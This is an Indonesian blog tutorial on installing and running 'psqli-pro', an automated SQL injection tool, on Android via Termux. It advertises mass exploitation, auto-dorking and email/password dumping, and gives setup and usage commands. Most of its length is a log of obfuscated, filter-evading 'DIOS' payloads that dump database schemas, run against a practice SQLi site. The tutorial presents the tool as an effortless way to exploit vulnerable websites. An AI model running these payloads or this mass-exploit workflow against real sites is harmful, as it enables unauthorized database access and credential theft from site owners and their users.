Tutorial SQLi Auto Menggunakan Tools Android

tutorial SQL I auto

SQLi ternyata bisa dikerjakan menggunakan tools? tools apa yang digunakan? dan bagaimana cara menggunakan tools tersebut? Yup SQLi bisa dikerjakan menggunakan tools, tentu saja agar mempersingkat waktu pengerjaan dan tidak perlu berpikir keras untuk mengeksekusi celahnya. Tools yang digunakan adalah psqli-pro. Pembuat tools ini adalah seseorang yang menggunakan nickname sebagai Agressiv1njector. Tentu saja fitur yang ada di tools ini sangat banyak dan cukup berguna buat kalian para pentester. Fitur – fitur yang tersedia di tools psqli-pro :

~ Single site injection

~ Mass Xploit sql-injection

~ Auto Dorking + Auto Xploit

~ SQLi Base64 injection

~ SQLi POST method

~ SQLi ERROR Based method

~ Scan site + auto inject ( web crawler )

~ Reverse ip vuln sqli + auto inject

~ Query Email Pass dumper + auto filter mail

~ Hash tools

~ Dork generator

~ New Admin Finder

~ Psqli Sqli / Xss / LFI / AdminFinder Scanner

Dan akan rilis juga fitur untuk SQL into out file, selengkapnya kalian bisa lihat di akun githubnya di bawah ini :

Untuk cara menggunakannya cukup mudah, kalian cuma perlu send inject pointnya dan tools tersebut akan mengeksekusi target itu secara otomatis.

Cara instalasi

Untuk kalian yang masi bingung dengan cara penggunaan termux, admin akan membantu kalian untuk install tools ini di termux kalian masing – masing. Masukkan command satu persatu seperti berikut (tanpa #).

# pkg install bash curl git

# git clone https://github.com/Agressiv1njector/psqli-pro

# cd psqli-pro

Cara Penggunaan

Setelah itu kalian pilih salah satu dari command dibawah, s untuk “string”. Bagi kalian yang belum tau apa itu string based. String based adalah cara eksekusi SQLi menggunakan string atau ‘

Contoh union based : www.site.com/index.php?id=234+union+select+1,2,3– –

Contoh string based : www.site.com/index.php?id=234’+union+select+1,2,3– –

# bash psqli.sh (untuk union based)

# bash psqli.sh s (untuk string based)

Jika sudah, maka akan muncul tampilan seperti ini.

Dikarenakan kita disini akan menggunakan tools untuk mengeksekusi sebuah target, maka kalian masuk ke opsi 1. Kalian masukkan inject point ke tools tersebut.

Lalu klik enter dan tunggu hasilnya.

Jika kalian ingin mencari query hasil eksekusi tadi, kalian run command berikut.

# cd

# cd psqli-pro

# cd output

# ls

Maka akan muncul site yang pernah kalian eksekusi menggunakan tools ini. Jika ingin membukanya masukkan command berikut.

# cd (target.com yang ada di list)

contoh :

# cd www.zixem.altervista.org

# strings log_query.txt

and boom maka akan muncul query dari web yang sudah pernah kalian eksekusi menggunakan tools ini.

Query https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(%60InFoRMAtiON_sCHeM%60.%60ColUMNs%60)where(%60TAblE_sCHemA%60=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c6c693e,TaBLe_nAMe,0x3a3a,column_name))))a)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(%60InFoRMAtiON_sCHeM%60.%60ColUMNs%60)where(%60TAblE_sCHemA%60=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c6c693e,TaBLe_nAMe,0x3a3a,column_name))))a)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x3a3a,2)),@,2))+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x3a3a,2)),@,2))+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@khatulistiwa)from(select(@khatulistiwa:=0x00),(select(@khatulistiwa)from(information_schema.columns)where(table_schema!=database())and(@khatulistiwa)in(@khatulistiwa:=concat(@khatulistiwa,0x3c6c693e,table_name,0x3a3a,column_name))))khatulistiwa)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@khatulistiwa)from(select(@khatulistiwa:=0x00),(select(@khatulistiwa)from(information_schema.columns)where(table_schema!=database())and(@khatulistiwa)in(@khatulistiwa:=concat(@khatulistiwa,0x3c6c693e,table_name,0x3a3a,column_name))))khatulistiwa)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database/**_**/())and(0x00)in(@x:=coNcat/**8**/(@x,0x3c6c693e,table_name,0x3a3a,column_name))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database/**_**/())and(0x00)in(@x:=coNcat/**8**/(@x,0x3c6c693e,table_name,0x3a3a,column_name))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+

Query https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(%60InFoRMAtiON_sCHeM%60.%60ColUMNs%60)where(%60TAblE_sCHemA%60=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c6c693e,TaBLe_nAMe,0x3a3a,column_name))))a)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(%60InFoRMAtiON_sCHeM%60.%60ColUMNs%60)where(%60TAblE_sCHemA%60=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c6c693e,TaBLe_nAMe,0x3a3a,column_name))))a)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x3a3a,2)),@,2))+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x3a3a,2)),@,2))+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@khatulistiwa)from(select(@khatulistiwa:=0x00),(select(@khatulistiwa)from(information_schema.columns)where(table_schema!=database())and(@khatulistiwa)in(@khatulistiwa:=concat(@khatulistiwa,0x3c6c693e,table_name,0x3a3a,column_name))))khatulistiwa)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@khatulistiwa)from(select(@khatulistiwa:=0x00),(select(@khatulistiwa)from(information_schema.columns)where(table_schema!=database())and(@khatulistiwa)in(@khatulistiwa:=concat(@khatulistiwa,0x3c6c693e,table_name,0x3a3a,column_name))))khatulistiwa)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database/**_**/())and(0x00)in(@x:=coNcat/**8**/(@x,0x3c6c693e,table_name,0x3a3a,column_name))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+
DIOS : https://www.zixem.altervista.org/SQLi/level1.php?id=1+and+mod(9,9)+div@x:=(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database/**_**/())and(0x00)in(@x:=coNcat/**8**/(@x,0x3c6c693e,table_name,0x3a3a,column_name))))x)+/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3–+


Penutupan

Dengan tools ini, kita menjadi lebih mudah dalam eksekusi web yang vuln terhadap SQLi. Sekian tutorial yang dapat admin berikan, semoga bermanfaat bagi para pembaca. Mohon maaf apabila terdapat kesalahan dalam penyampaian atau pengucapan kata. Thanks For Reading!

Exit mobile version